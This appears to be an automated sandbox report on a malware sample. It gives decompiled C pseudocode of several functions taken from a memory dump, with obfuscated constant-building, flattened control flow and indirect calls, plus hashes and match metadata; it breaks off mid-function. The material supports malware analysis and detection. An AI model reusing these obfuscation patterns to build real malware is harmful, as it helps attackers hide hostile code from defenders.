                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 98%
                                                      			E0023839D(void* __ecx, void* __edi) {
                                                      				char _v4;
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				int _t181;
                                                      				signed int _t184;
                                                      				signed int _t186;
                                                      				signed int _t187;
                                                      				signed int _t188;
                                                      				signed int _t189;
                                                      				signed int _t194;
                                                      				void* _t211;
                                                      				void* _t215;
                                                      				signed int _t217;
                                                      
                                                      				_v28 = 0x5ca2;
                                                      				_v28 = _v28 + 0x82ee;
                                                      				_v28 = _v28 << 0xb;
                                                      				_v28 = _v28 ^ 0x06fc8008;
                                                      				_v52 = 0x31f1;
                                                      				_v52 = _v52 * 0x4e;
                                                      				_t215 = __ecx;
                                                      				_t186 = 0x39;
                                                      				_v52 = _v52 * 0x4d;
                                                      				_v52 = _v52 >> 7;
                                                      				_v52 = _v52 ^ 0x00092748;
                                                      				_v20 = 0x7fc5;
                                                      				_v20 = _v20 * 0x6b;
                                                      				_v20 = _v20 << 2;
                                                      				_v20 = _v20 ^ 0x00d59d54;
                                                      				_v44 = 0xb39b;
                                                      				_v44 = _v44 + 0xf7d;
                                                      				_v44 = _v44 | 0x2a7b5142;
                                                      				_v44 = _v44 + 0xffff17c4;
                                                      				_v44 = _v44 ^ 0x2a7aeb0e;
                                                      				_v60 = 0x1587;
                                                      				_v60 = _v60 | 0x5979cfaa;
                                                      				_v60 = _v60 ^ 0xb2ac8491;
                                                      				_v60 = _v60 ^ 0x62b96002;
                                                      				_v60 = _v60 ^ 0x896c4508;
                                                      				_v16 = 0x3e7;
                                                      				_v16 = _v16 | 0x10c95731;
                                                      				_v16 = _v16 ^ 0x10c93485;
                                                      				_v56 = 0x1ea8;
                                                      				_v56 = _v56 << 4;
                                                      				_v56 = _v56 << 6;
                                                      				_v56 = _v56 / _t186;
                                                      				_v56 = _v56 ^ 0x0002353c;
                                                      				_v12 = 0x5bc0;
                                                      				_t187 = 0x13;
                                                      				_v12 = _v12 / _t187;
                                                      				_v12 = _v12 ^ 0x00001b6c;
                                                      				_v48 = 0x8f53;
                                                      				_v48 = _v48 ^ 0x72e3c217;
                                                      				_v48 = _v48 >> 0xb;
                                                      				_v48 = _v48 ^ 0x701cd0a1;
                                                      				_v48 = _v48 ^ 0x7012c214;
                                                      				_v24 = 0xa180;
                                                      				_v24 = _v24 | 0x7584ea2b;
                                                      				_v24 = _v24 + 0x36fb;
                                                      				_v24 = _v24 ^ 0x75854120;
                                                      				_v32 = 0x424b;
                                                      				_v32 = _v32 ^ 0x8f16dfbf;
                                                      				_v32 = _v32 << 0xc;
                                                      				_v32 = _v32 + 0xffffa50c;
                                                      				_v32 = _v32 ^ 0x69defe02;
                                                      				_v8 = 0x6622;
                                                      				_t188 = 0x62;
                                                      				_v8 = _v8 / _t188;
                                                      				_v8 = _v8 ^ 0x00007651;
                                                      				_v36 = 0x9705;
                                                      				_t189 = 0x5a;
                                                      				_v36 = _v36 * 0x11;
                                                      				_v36 = _v36 / _t189;
                                                      				_v36 = _v36 | 0xcd876993;
                                                      				_v36 = _v36 ^ 0xcd872ff9;
                                                      				_v40 = 0x44cf;
                                                      				_v40 = _v40 | 0x3f74ab7e;
                                                      				_v40 = _v40 << 1;
                                                      				_v40 = _v40 + 0x396f;
                                                      				_v40 = _v40 ^ 0x7eea1d0a;
                                                      				_v4 = E00248C8F(_t189);
                                                      				_t217 = _v28 + E00248C8F(_t189) % _v52;
                                                      				_t184 = _v20 + E00248C8F(_v52) % _v44;
                                                      				if(_t217 != 0) {
                                                      					_t211 = _t215;
                                                      					_t194 = _t217 >> 1;
                                                      					_t215 = _t215 + _t217 * 2;
                                                      					_t181 = memset(_t211, 0x2d002d, _t194 << 2);
                                                      					asm("adc ecx, ecx");
                                                      					memset(_t211 + _t194, _t181, 0);
                                                      				}
                                                      				E0023D6C9(_v8, _t215, 3, _t184, _v36,  &_v4, _v40);
                                                      				 *((short*)(_t215 + _t184 * 2)) = 0;
                                                      				return 0;
                                                      			}





























                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BQ{*$H'$KB$Qv$o9
                                                      • API String ID: 0-3657823386
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E00235B79(intOrPtr __ecx, intOrPtr* __edx) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr* _v20;
                                                      				intOrPtr _v24;
                                                      				char _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				intOrPtr _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				unsigned int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				signed int _v112;
                                                      				signed int _v116;
                                                      				intOrPtr* _t203;
                                                      				intOrPtr _t214;
                                                      				intOrPtr _t215;
                                                      				intOrPtr _t216;
                                                      				intOrPtr _t220;
                                                      				intOrPtr _t224;
                                                      				void* _t243;
                                                      				intOrPtr _t244;
                                                      				intOrPtr _t245;
                                                      				signed int _t246;
                                                      				signed int _t247;
                                                      				signed int _t248;
                                                      				signed int _t249;
                                                      				intOrPtr _t250;
                                                      				intOrPtr _t252;
                                                      				signed int* _t253;
                                                      
                                                      				_t215 = __ecx;
                                                      				_t253 =  &_v116;
                                                      				_v20 = __edx;
                                                      				_v32 = __ecx;
                                                      				_v12 = 0xafae1;
                                                      				_v4 = 0;
                                                      				_v8 = 0x46e7c7;
                                                      				_v100 = 0x4e85;
                                                      				_v100 = _v100 >> 4;
                                                      				_v100 = _v100 + 0xa122;
                                                      				_v100 = _v100 ^ 0x0000ef7f;
                                                      				_v76 = 0x276c;
                                                      				_v76 = _v76 + 0xa4ad;
                                                      				_v76 = _v76 ^ 0x0000a5d4;
                                                      				_v116 = 0xc292;
                                                      				_v36 = 0;
                                                      				_v116 = _v116 * 0x3d;
                                                      				_t243 = 0x5ac7f3d;
                                                      				_v116 = _v116 << 0xc;
                                                      				_t246 = 0x1a;
                                                      				_v116 = _v116 / _t246;
                                                      				_v116 = _v116 ^ 0x08d6c610;
                                                      				_v96 = 0x57a;
                                                      				_v96 = _v96 << 4;
                                                      				_v96 = _v96 + 0xde71;
                                                      				_v96 = _v96 ^ 0x000109c0;
                                                      				_v108 = 0xf9e9;
                                                      				_v108 = _v108 >> 0xe;
                                                      				_v108 = _v108 + 0xffffa4d5;
                                                      				_t247 = 0x1e;
                                                      				_v108 = _v108 * 0x3c;
                                                      				_v108 = _v108 ^ 0xffeac835;
                                                      				_v112 = 0x3502;
                                                      				_v112 = _v112 >> 0xc;
                                                      				_v112 = _v112 + 0xffffe509;
                                                      				_v112 = _v112 >> 0xe;
                                                      				_v112 = _v112 ^ 0x0003f015;
                                                      				_v64 = 0x4162;
                                                      				_v64 = _v64 + 0xffff06ec;
                                                      				_v64 = _v64 ^ 0xffff0d41;
                                                      				_v68 = 0x29f6;
                                                      				_v68 = _v68 | 0xa40114db;
                                                      				_v68 = _v68 ^ 0xa4015458;
                                                      				_v72 = 0x8ebc;
                                                      				_v72 = _v72 | 0xb773f5bd;
                                                      				_v72 = _v72 ^ 0xb773df20;
                                                      				_v52 = 0x199c;
                                                      				_v52 = _v52 + 0x59c9;
                                                      				_v52 = _v52 ^ 0x00005d96;
                                                      				_v56 = 0x9de2;
                                                      				_v56 = _v56 | 0x18b104fc;
                                                      				_v56 = _v56 ^ 0x18b18c09;
                                                      				_v60 = 0xcf04;
                                                      				_v60 = _v60 >> 0xd;
                                                      				_v60 = _v60 ^ 0x0000237a;
                                                      				_v92 = 0x847f;
                                                      				_v92 = _v92 / _t247;
                                                      				_v92 = _v92 + 0xfffff45a;
                                                      				_v92 = _v92 ^ 0xffffeb4a;
                                                      				_v104 = 0x72c3;
                                                      				_v104 = _v104 * 0x70;
                                                      				_v104 = _v104 >> 0xa;
                                                      				_v104 = _v104 + 0xffffb2c0;
                                                      				_v104 = _v104 ^ 0xffff9126;
                                                      				_v48 = 0x26a;
                                                      				_t248 = 0x5f;
                                                      				_v48 = _v48 / _t248;
                                                      				_v48 = _v48 ^ 0x00002d62;
                                                      				_v88 = 0x3bd5;
                                                      				_v88 = _v88 | 0xeefd350a;
                                                      				_v88 = _v88 >> 1;
                                                      				_v88 = _v88 ^ 0x777ec4bd;
                                                      				_v44 = 0x124c;
                                                      				_v44 = _v44 + 0xffff1b1d;
                                                      				_v44 = _v44 ^ 0xffff4aeb;
                                                      				_v80 = 0x5ade;
                                                      				_t249 = 0x3c;
                                                      				_t252 = _v20;
                                                      				_t214 = _v20;
                                                      				_v80 = _v80 * 0x3a;
                                                      				_v80 = _v80 + 0xffff943f;
                                                      				_v80 = _v80 ^ 0x0014640e;
                                                      				_v84 = 0x6f1d;
                                                      				_t250 = _v16;
                                                      				_v84 = _v84 / _t249;
                                                      				_v84 = _v84 * 0x74;
                                                      				_v84 = _v84 ^ 0x0000fa63;
                                                      				_t199 = _v40;
                                                      				while(_t243 != 0x5ac7f3d) {
                                                      					if(_t243 == 0x17993a65) {
                                                      						_t216 = E0024023A(_t215, _v96, _v108, _t199, _v112, _t252,  &_v28);
                                                      						_t253 =  &(_t253[5]);
                                                      						_v36 = _t216;
                                                      						if(_t216 == 0) {
                                                      							_t244 = _v36;
                                                      							goto L19;
                                                      						} else {
                                                      							_t220 = _v28;
                                                      							if(_t220 == 0) {
                                                      								goto L15;
                                                      							} else {
                                                      								_t199 = _v40 + _t220;
                                                      								_v40 = _v40 + _t220;
                                                      								_t252 = _t252 - _t220;
                                                      								if(_t252 != 0) {
                                                      									goto L6;
                                                      								} else {
                                                      									_t224 = _t250 + _t250;
                                                      									_push(_t224);
                                                      									_push(_t224);
                                                      									_v24 = _t224;
                                                      									_t245 = E00238736(_t224);
                                                      									if(_t245 == 0) {
                                                      										goto L15;
                                                      									} else {
                                                      										E00242674(_v52, _v56, _t250, _t245, _v60, _v92, _t214);
                                                      										E0023F536(_v104, _v48, _v88, _t214);
                                                      										_t252 = _t250;
                                                      										_t199 = _t245 + _t250;
                                                      										_t250 = _v24;
                                                      										_t253 =  &(_t253[7]);
                                                      										_v40 = _t199;
                                                      										_t214 = _t245;
                                                      										if(_t252 == 0) {
                                                      											goto L15;
                                                      										} else {
                                                      											goto L6;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					} else {
                                                      						if(_t243 != 0x1ebe7f62) {
                                                      							L14:
                                                      							if(_t243 != 0x20fb0f57) {
                                                      								continue;
                                                      							} else {
                                                      								goto L15;
                                                      							}
                                                      						} else {
                                                      							_t250 = 0x10000;
                                                      							_push(_t215);
                                                      							_push(_t215);
                                                      							_t199 = E00238736(0x10000);
                                                      							_t214 = _t199;
                                                      							if(_t214 == 0) {
                                                      								L15:
                                                      								_t244 = _v36;
                                                      								if(_t244 == 0) {
                                                      									L19:
                                                      									E0023F536(_v44, _v80, _v84, _t214);
                                                      								} else {
                                                      									_t203 = _v20;
                                                      									 *_t203 = _t214;
                                                      									 *((intOrPtr*)(_t203 + 4)) = _t250 - _t252;
                                                      								}
                                                      							} else {
                                                      								_v40 = _t199;
                                                      								_t252 = 0x10000;
                                                      								L6:
                                                      								_t215 = _v32;
                                                      								_t243 = 0x17993a65;
                                                      								continue;
                                                      							}
                                                      						}
                                                      					}
                                                      					return _t244;
                                                      				}
                                                      				_t243 = 0x1ebe7f62;
                                                      				goto L14;
                                                      			}
















































                                                      0x00235e3d
                                                      0x00235e3d
                                                      0x00235e41
                                                      0x00235e43
                                                      0x00235e43
                                                      0x00235e47
                                                      0x00000000
                                                      0x00235e47
                                                      0x00235e37
                                                      0x00235e11
                                                      0x00235f28
                                                      0x00235f28
                                                      0x00235efb
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: b-$bA$l'$z#
                                                      • API String ID: 0-3285866504
                                                      • Opcode ID: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
                                                      • Instruction ID: f40d58a301268e945a23b9e3aabd25d160faf049ba719d1082dafa4c6824e860
                                                      • Opcode Fuzzy Hash: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
                                                      • Instruction Fuzzy Hash: 2DA130B15187829FD368CF69C48980FBBE1BBC4718F548A1DF59587260D3B4DA098F83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E002380BA(intOrPtr* __ecx, void* __edx, intOrPtr _a4, signed int* _a8) {
                                                      				char _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				unsigned int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				signed int _v112;
                                                      				signed int _v116;
                                                      				signed int _v120;
                                                      				signed int _v124;
                                                      				void* _t96;
                                                      				signed int _t110;
                                                      				signed int _t115;
                                                      				void* _t118;
                                                      				intOrPtr* _t132;
                                                      				signed int* _t133;
                                                      				signed int* _t136;
                                                      
                                                      				_t133 = _a8;
                                                      				_push(_t133);
                                                      				_push(_a4);
                                                      				_t132 = __ecx;
                                                      				_push(__ecx);
                                                      				E0023602B(_t96);
                                                      				_v96 = 0xfd71;
                                                      				_t136 =  &(( &_v124)[4]);
                                                      				_v96 = _v96 >> 3;
                                                      				_v96 = _v96 ^ 0x00001ccd;
                                                      				_t118 = 0x30cb7a4b;
                                                      				_v120 = 0xdf4c;
                                                      				_t115 = 3;
                                                      				_v120 = _v120 * 0xb;
                                                      				_v120 = _v120 << 0xb;
                                                      				_v120 = _v120 ^ 0x4cc20427;
                                                      				_v100 = 0xc552;
                                                      				_v100 = _v100 << 1;
                                                      				_v100 = _v100 ^ 0x0001a6ce;
                                                      				_v124 = 0x18f9;
                                                      				_v124 = _v124 ^ 0xb394f6a4;
                                                      				_v124 = _v124 | 0xdedfeaf6;
                                                      				_v124 = _v124 ^ 0xffdfdfcb;
                                                      				_v104 = 0x111;
                                                      				_v104 = _v104 / _t115;
                                                      				_v104 = _v104 ^ 0x000052be;
                                                      				_v108 = 0x5c9e;
                                                      				_v108 = _v108 * 0x3f;
                                                      				_v108 = _v108 ^ 0x0016b186;
                                                      				_v112 = 0xa32c;
                                                      				_v112 = _v112 << 3;
                                                      				_v112 = _v112 >> 0xd;
                                                      				_v112 = _v112 ^ 0x000047d3;
                                                      				_v116 = 0x4558;
                                                      				_v116 = _v116 >> 0xb;
                                                      				_v116 = _v116 ^ 0x0dcfa8f2;
                                                      				_v116 = _v116 ^ 0x0dcf9328;
                                                      				_v92 = 0xa46a;
                                                      				_v92 = _v92 | 0x10f37349;
                                                      				_v92 = _v92 ^ 0x10f3c95f;
                                                      				_v80 = 0x75fc;
                                                      				_v80 = _v80 | 0x150fa2b7;
                                                      				_v80 = _v80 ^ 0x150fb0d6;
                                                      				_v84 = 0x120;
                                                      				_v84 = _v84 << 6;
                                                      				_v84 = _v84 ^ 0x00001616;
                                                      				_v88 = 0x286e;
                                                      				_v88 = _v88 * 0x36;
                                                      				_v88 = _v88 ^ 0x0008f8fa;
                                                      				do {
                                                      					while(_t118 != 0x75fb138) {
                                                      						if(_t118 == 0xe7893d9) {
                                                      							E0024360F( &_v76, _v112, _v116,  *_t132, _v92);
                                                      							_t136 =  &(_t136[3]);
                                                      							_t118 = 0x75fb138;
                                                      							continue;
                                                      						} else {
                                                      							if(_t118 == 0xf76409b) {
                                                      								_push(_t118);
                                                      								_push(_t118);
                                                      								_t110 = E00238736(_t133[1]);
                                                      								 *_t133 = _t110;
                                                      								__eflags = _t110;
                                                      								if(__eflags != 0) {
                                                      									_t118 = 0x11f2e7ae;
                                                      									continue;
                                                      								}
                                                      							} else {
                                                      								if(_t118 == 0x11f2e7ae) {
                                                      									E002450F2( &_v76, _v124, _v104, _v108, _t133);
                                                      									_t136 =  &(_t136[3]);
                                                      									_t118 = 0xe7893d9;
                                                      									continue;
                                                      								} else {
                                                      									if(_t118 == 0x25eae02b) {
                                                      										_t133[1] = E002461B8(_t132);
                                                      										_t118 = 0xf76409b;
                                                      										continue;
                                                      									} else {
                                                      										if(_t118 != 0x30cb7a4b) {
                                                      											goto L14;
                                                      										} else {
                                                      											 *_t133 = 0;
                                                      											_t118 = 0x25eae02b;
                                                      											_t133[1] = 0;
                                                      											continue;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L15;
                                                      					}
                                                      					E00237998(_v80, _v84, __eflags, _t132 + 4,  &_v76, _v88);
                                                      					_t136 =  &(_t136[3]);
                                                      					_t118 = 0x2f2a8f34;
                                                      					L14:
                                                      					__eflags = _t118 - 0x2f2a8f34;
                                                      				} while (__eflags != 0);
                                                      				L15:
                                                      				__eflags =  *_t133;
                                                      				_t95 =  *_t133 != 0;
                                                      				__eflags = _t95;
                                                      				return 0 | _t95;
                                                      			}
























                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: +%$+%$XE$n(
                                                      • API String ID: 0-3838449085
                                                      • Opcode ID: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
                                                      • Instruction ID: 9a908f72add2eaf95adf02977a606c566f141352fdc4931d8fd693337051bb70
                                                      • Opcode Fuzzy Hash: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
                                                      • Instruction Fuzzy Hash: 5A5166B01197429FC358DF20C88A82FBBF1BF84748F505A1DF5869A260D7B18A59CF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E00248D1C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                      				signed int _v4;
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				void* _t108;
                                                      				intOrPtr _t110;
                                                      				intOrPtr _t120;
                                                      				signed int _t121;
                                                      				signed int _t122;
                                                      				signed int _t123;
                                                      				signed int _t124;
                                                      				intOrPtr _t127;
                                                      				intOrPtr _t128;
                                                      				intOrPtr _t144;
                                                      				intOrPtr* _t145;
                                                      				void* _t146;
                                                      				intOrPtr* _t147;
                                                      
                                                      				_v36 = 0x4ef4;
                                                      				_v36 = _v36 + 0xa860;
                                                      				_v36 = _v36 | 0x1c77c6a8;
                                                      				_t121 = 0x2a;
                                                      				_v36 = _v36 / _t121;
                                                      				_v36 = _v36 ^ 0x00adf3e3;
                                                      				_v16 = 0xcfa4;
                                                      				_v16 = _v16 << 0xe;
                                                      				_v16 = _v16 ^ 0x33e94134;
                                                      				_v24 = 0x2a39;
                                                      				_v24 = _v24 ^ 0x66b190f2;
                                                      				_v24 = _v24 + 0x3fe;
                                                      				_v24 = _v24 ^ 0x66b19dc3;
                                                      				_v12 = 0x275a;
                                                      				_v12 = _v12 ^ 0xee83f1bc;
                                                      				_v12 = _v12 ^ 0xee83c69b;
                                                      				_v20 = 0x82c0;
                                                      				_v20 = _v20 | 0x74e44d6f;
                                                      				_v20 = _v20 ^ 0xeca8f7fc;
                                                      				_v20 = _v20 ^ 0x984c40be;
                                                      				_v32 = 0xcbb2;
                                                      				_v32 = _v32 ^ 0xf8a1ef7c;
                                                      				_t122 = 0x26;
                                                      				_v32 = _v32 / _t122;
                                                      				_v32 = _v32 ^ 0xc0a4f16a;
                                                      				_v32 = _v32 ^ 0xc62e2f9a;
                                                      				_v28 = 0xce4d;
                                                      				_t123 = 0x68;
                                                      				_v28 = _v28 / _t123;
                                                      				_t124 = 0xf;
                                                      				_v28 = _v28 / _t124;
                                                      				_v28 = _v28 ^ 0x15eb9a2e;
                                                      				_v28 = _v28 ^ 0x15ebc86f;
                                                      				_v4 = 0x1911;
                                                      				_v4 = _v4 ^ 0x7b1b0330;
                                                      				_v4 = _v4 ^ 0x7b1b2d08;
                                                      				_v8 = 0x92f;
                                                      				_v8 = _v8 >> 0xb;
                                                      				_v8 = _v8 ^ 0x00005602;
                                                      				_t108 = E002485BA(_t124);
                                                      				_t144 = _a4;
                                                      				_t146 = _t108;
                                                      				_v36 = 0x94f3;
                                                      				_v36 = _v36 + 0xffff06f8;
                                                      				_v36 = _v36 | 0xf59d433d;
                                                      				_v36 = _v36 >> 0xe;
                                                      				_t148 = _t144 + 0x24;
                                                      				_v36 = _v36 ^ 0x0003ffff;
                                                      				_t120 = E0023E29C(_v16, _v24, _t144 + 0x24);
                                                      				_t110 =  *((intOrPtr*)(_t144 + 8));
                                                      				if(_t110 != _v36 && _t110 != _t146) {
                                                      					_t127 =  *((intOrPtr*)(_t144 + 0x18));
                                                      					if(_t127 != _v36 && _t127 != _t146) {
                                                      						_t145 = _a8;
                                                      						_t128 =  *_t145;
                                                      						if(E00248D05(_t128, _t120) == 0) {
                                                      							_push(_t128);
                                                      							_push(_t128);
                                                      							_t147 = E00238736(0x224);
                                                      							if(_t147 != 0) {
                                                      								_t95 = _t147 + 0xc; // 0xc
                                                      								E00236636(_t95, _v28, _v4, _v8, _t148);
                                                      								 *_t147 = _t120;
                                                      								 *((intOrPtr*)(_t147 + 0x220)) =  *_t145;
                                                      								 *_t145 = _t147;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return 1;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /$4A3$9*$oMt
                                                      • API String ID: 0-1186868077
                                                      • Opcode ID: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
                                                      • Instruction ID: 48acea688c4007531ed03294033ddda8ed6829c766865f32edfdf92098ab259e
                                                      • Opcode Fuzzy Hash: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
                                                      • Instruction Fuzzy Hash: 725154716183429FD358CF25D48A90FFBE1FB98358F204A1CF49996260C7B4DA59CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00232A30(intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				char _v52;
                                                      				intOrPtr _v56;
                                                      				char _v60;
                                                      				char _v124;
                                                      				void* _t120;
                                                      				signed int _t130;
                                                      				signed int _t131;
                                                      				signed int _t132;
                                                      				intOrPtr _t146;
                                                      
                                                      				_v12 = 0xa0d7;
                                                      				_v12 = _v12 + 0x7eb;
                                                      				_v12 = _v12 + 0xffff9690;
                                                      				_t130 = 0x70;
                                                      				_v12 = _v12 / _t130;
                                                      				_v12 = _v12 ^ 0x00005cb7;
                                                      				_v36 = 0xa6e2;
                                                      				_t131 = 0x7c;
                                                      				_t146 = _a4;
                                                      				_v36 = _v36 * 0x6c;
                                                      				_v36 = _v36 ^ 0x00462f2b;
                                                      				_v20 = 0xf5ce;
                                                      				_v20 = _v20 + 0xec5e;
                                                      				_v20 = _v20 | 0x882d1c6f;
                                                      				_v20 = _v20 ^ 0x882decee;
                                                      				_v8 = 0xef73;
                                                      				_v8 = _v8 * 0x50;
                                                      				_v8 = _v8 ^ 0x984778b6;
                                                      				_v8 = _v8 | 0x0acb781a;
                                                      				_v8 = _v8 ^ 0x9acfaccf;
                                                      				_v16 = 0xf20c;
                                                      				_t132 = 0x6d;
                                                      				_v16 = _v16 / _t131;
                                                      				_v16 = _v16 | 0x2a1cc570;
                                                      				_v16 = _v16 * 0x5c;
                                                      				_v16 = _v16 ^ 0x225769f1;
                                                      				_v28 = 0xd318;
                                                      				_v28 = _v28 / _t132;
                                                      				_v28 = _v28 ^ 0x955bcf9a;
                                                      				_v28 = _v28 ^ 0x955bcc47;
                                                      				_v40 = 0xc2b8;
                                                      				_v40 = _v40 + 0x609d;
                                                      				_v40 = _v40 ^ 0x00014342;
                                                      				_v24 = 0x21cc;
                                                      				_v24 = _v24 << 5;
                                                      				_v24 = _v24 << 0xa;
                                                      				_v24 = _v24 ^ 0x10e64576;
                                                      				_v48 = 0xc8ed;
                                                      				_v48 = _v48 + 0xffffe729;
                                                      				_v48 = _v48 ^ 0x00009812;
                                                      				_v32 = 0xdf82;
                                                      				_v32 = _v32 ^ 0xa0cf88d1;
                                                      				_v32 = _v32 >> 4;
                                                      				_v32 = _v32 ^ 0x0a0ce5c9;
                                                      				_v44 = 0xf2d1;
                                                      				_v44 = _v44 + 0x3831;
                                                      				_v44 = _v44 ^ 0x00011e20;
                                                      				_t120 =  *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 1, 0);
                                                      				_t149 = _t120;
                                                      				if(_t120 != 0) {
                                                      					E00242349(_v12, _v36, _v20, _v8, _t132);
                                                      					_v60 =  &_v124;
                                                      					_v56 = E0023F85D(_v16, _t149,  &_v52, _v28, _v40, _v24);
                                                      					 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0xa,  &_v60,  &_v124);
                                                      					E00242025(_v48, _v56, _v32, _v44);
                                                      				}
                                                      				return 0;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: +/F$18$^$s
                                                      • API String ID: 0-1171060364
                                                      • Opcode ID: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
                                                      • Instruction ID: e2164e15692062245ebe3d6e82817479502e3cdd1ce4b78a57f7aeaccf719db0
                                                      • Opcode Fuzzy Hash: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
                                                      • Instruction Fuzzy Hash: E351F372D01309EBEF08CFE1C94A9DEBBB2FB04314F208159D511B62A0D7B96A55DF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E002473AC() {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				char _v28;
                                                      				char _v32;
                                                      				char _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				signed int _t194;
                                                      				intOrPtr _t196;
                                                      				intOrPtr _t199;
                                                      				intOrPtr _t202;
                                                      				intOrPtr _t204;
                                                      				intOrPtr _t205;
                                                      				signed int _t207;
                                                      				signed int _t208;
                                                      				signed int _t209;
                                                      				signed int _t210;
                                                      				void* _t238;
                                                      				char _t242;
                                                      				signed int* _t243;
                                                      				void* _t245;
                                                      
                                                      				_t243 =  &_v108;
                                                      				_v24 = 0x44d5d8;
                                                      				_t205 = 0;
                                                      				_v20 = 0;
                                                      				_v40 = 0x23cf;
                                                      				_v40 = _v40 ^ 0xbe38916f;
                                                      				_v40 = _v40 ^ 0xbe38820d;
                                                      				_v108 = 0x2e00;
